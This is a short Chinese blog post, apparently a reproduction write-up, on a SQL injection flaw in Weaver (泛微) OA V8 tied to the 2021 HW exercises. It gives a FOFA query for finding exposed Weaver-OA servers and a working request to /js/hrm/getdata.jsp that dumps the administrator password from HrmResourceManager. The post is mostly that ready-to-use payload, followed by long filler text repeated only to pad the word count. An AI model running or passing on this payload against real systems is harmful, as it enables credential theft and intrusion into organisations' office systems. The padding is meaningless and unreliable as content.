vlambda博客
学习文章列表

泛微OA V8 SQL注入漏洞复现(2021HW)

fofa搜:app="Weaver-OA"


/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select password as id from HrmResourceManager

泛微OA V8 SQL注入漏洞复现(2021HW)

网上找到的截图,哈哈哈,我说怎么猜不到username:

泛微OA V8 SQL注入漏洞复现(2021HW)

然后查 loginid:(没想到....早知道爆破一下的)



参考:

https://mp.weixin.qq.com/s/3tuDJyUWKS8yiLRsfvn2WQ



凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数